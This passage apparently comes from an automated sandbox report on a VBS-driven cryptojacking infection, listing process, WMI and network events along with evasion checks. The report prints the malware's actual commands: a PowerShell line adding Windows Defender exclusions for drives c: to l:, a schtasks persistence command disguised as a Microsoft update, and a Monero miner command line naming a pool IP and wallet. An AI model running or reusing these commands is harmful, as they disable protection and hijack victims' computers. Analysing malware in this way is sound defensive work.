        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\Public\WindowsUpdate\mservice.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Query firmware table information (likely to detect VMs)
        Source: C:\Users\Public\WindowsUpdate\mservice.exeSystem information queried: FirmwareTableInformationJump to behavior
        Queries sensitive share information (via WMI, WIN32_SHARE, often done to detect sandboxes)
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like &apos;%$%&apos;
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like &apos;%$%&apos;
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like &apos;%$%&apos;
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like &apos;%$%&apos;
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like &apos;%$%&apos;
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like &apos;%$%&apos;
        Potential evasive VBS script found (sleep loop)
        Source: C:\Users\Public\7g.exeDropped file: Do Until .NameSpace(zipFile).Items.Count = _ WScript.Sleep 1000 Jump to dropped file
        Source: C:\Users\Public\7g.exeDropped file: do while 1 wscript.sleep(10000)Jump to dropped file
        Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk where DriveType=2 or DriveType=4
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk where DriveType=2 or DriveType=4
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk where DriveType=2 or DriveType=4
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk where DriveType=2 or DriveType=4
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk where DriveType=2 or DriveType=4
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk where DriveType=2 or DriveType=4
        Queries sensitive share information (via WMI, Win32_Share, often done to detect virtual machines)
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like &apos;%$%&apos;
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like &apos;%$%&apos;
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like &apos;%$%&apos;
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like &apos;%$%&apos;
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like &apos;%$%&apos;
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Share where not name like &apos;%$%&apos;
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5028Thread sleep count: 9721 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6904Thread sleep time: -2767011611056431s >= -30000sJump to behavior
        Source: C:\Users\Public\WindowsUpdate\mservice.exe TID: 6416Thread sleep time: -199780s >= -30000sJump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9721Jump to behavior
        Source: C:\Users\Public\WindowsUpdate\mservice.exeWindow / User API: threadDelayed 9989Jump to behavior
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
        Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
        Source: C:\Users\Public\7g.exeDropped PE file which has not been started: C:\Users\Public\WindowsUpdate\WinRing0x64.sysJump to dropped file
        Source: C:\Users\Public\7g.exeDropped PE file which has not been started: C:\Users\Public\WindowsUpdate\ps.exeJump to dropped file
        Source: C:\Users\Public\7g.exeDropped PE file which has not been started: C:\Users\Public\WindowsUpdate\go.exeJump to dropped file
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\Public\7g.exeCode function: 11_2_003B716C __EH_prolog,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,11_2_003B716C
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Adobe\Acrobat\Jump to behavior
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Jump to behavior
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Adobe\Jump to behavior
        Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
        Source: wscript.exe, 00000018.00000003.897773136.000001DBC74D0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
        Source: wscript.exe, 00000005.00000003.811414806.000002216311D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.858655277.000002216311D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.811414806.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860768150.000002216311D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.00000221630D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.855760178.000002216311D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.860747465.00000221630D3000.00000004.00000020.00020000.00000000.sdmp, mservice.exe, 00000013.00000002.992637368.0000018540531000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\Public\7g.exeCode function: 11_2_003B6553 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,11_2_003B6553
        Source: C:\Users\Public\7g.exeCode function: 11_2_003EA7A4 GetCurrentProcess,GetProcessTimes,fputs,memset,GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,fputs,__aulldiv,fputs,fputs,__aulldiv,__aulldiv,fputs,11_2_003EA7A4
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        System process connects to network (likely due to code injection or exploit)
        Source: C:\Windows\System32\wscript.exeNetwork Connect: 49.12.202.237 443Jump to behavior
        Source: C:\Windows\System32\wscript.exeDomain query: www.7-zip.org
        Source: C:\Windows\System32\wscript.exeDomain query: gitlab.com
        Source: C:\Windows\System32\wscript.exeNetwork Connect: 172.65.251.78 443Jump to behavior
        Benign windows process drops PE files
        Source: C:\Windows\System32\wscript.exeFile created: 7zr[1].exe.5.drJump to dropped file
        Adds a directory exclusion to Windows Defender
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:"Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\Public\WindowsUpdate\mservice.exe "c:\users\public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 42i5pnzm7cvxc77nhzvzhreafavbjx4gvxyvea8hkhuxhuzhqfdxwfjmcczz959w8kelv8ffgk6dkexqq9uhaxaucj5abbu -p 0606-17h28m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-title
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\Public\WindowsUpdate\mservice.exe "c:\users\public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 42i5pnzm7cvxc77nhzvzhreafavbjx4gvxyvea8hkhuxhuzhqfdxwfjmcczz959w8kelv8ffgk6dkexqq9uhaxaucj5abbu -p 0606-17h28m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-titleJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\Public\7g.exe C:\Users\Public\7g.exe" e -p1625092 -y -o"C:\Users\Public\WindowsUpdate" "C:\Users\Public\gmail.7zJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\System32\cmd.exe" /c schtasks.exe /create /f /tn MicrosoftUpdateService /XML "%public%\WindowsUpdate\Update.xmlJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\Public\WindowsUpdate\mozilla.vbs" //b //nologoJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -C "Add-MpPreference -ExclusionPath c:,d:,e:,f:,g:,h:,i:,j:,k:,l:"Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /f /tn MicrosoftUpdateService /XML "C:\Users\Public\WindowsUpdate\Update.xml"Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\Public\WindowsUpdate\mservice.exe "C:\Users\Public\windowsupdate\mservice.exe" -o 141.94.96.144:443 -u 42i5pNZm7cvXC77nHzvzhReAfaVbJX4GVXYvea8hKhUXHUZHQFDxwFJMCcZz959w8KELv8fFgk6DKExQQ9UHAxAuCJ5abbu -p 0606-17h28m --coin=monero -k --tls --donate-level=0 --randomx-mode=light --threads=8 --pause-on-active=10 --no-titleJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologoJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologoJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\wscript.exe" c:\users\public\windowsupdate\sarmat.vbs //b //nologo
        Source: conhost.exe, 00000014.00000002.992832390.000002E14B650000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: XProgram Manager
        Source: conhost.exe, 00000014.00000002.992832390.000002E14B650000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: conhost.exe, 00000014.00000002.992832390.000002E14B650000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: conhost.exe, 00000014.00000002.992832390.000002E14B650000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
